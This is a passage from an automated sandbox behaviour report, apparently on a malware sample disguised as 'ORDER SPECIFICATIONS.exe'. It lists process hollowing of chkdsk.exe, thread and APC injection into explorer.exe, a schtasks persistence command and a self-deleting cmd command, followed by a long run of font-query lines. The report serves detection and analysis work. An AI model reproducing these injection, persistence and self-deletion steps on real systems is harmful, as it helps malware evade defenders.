Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Thread register set: target process: 3472			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Thread register set: target process: 3472			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe

Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 11D0000

Jump to behavior

Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\LvZiFDk' /XML 'C:\Users\user\AppData\Local\Temp\tmpDA15.tmp'	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process created: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process created: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe'	Jump to behavior

Source: explorer.exe, 00000007.00000000.259338956.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000010.00000002.502036700.0000000007BF0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.259338956.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000010.00000002.502036700.0000000007BF0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000007.00000000.259338956.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000010.00000002.502036700.0000000007BF0000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000007.00000000.258833766.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000007.00000000.259338956.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000010.00000002.502036700.0000000007BF0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000007.00000000.259338956.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000010.00000002.502036700.0000000007BF0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
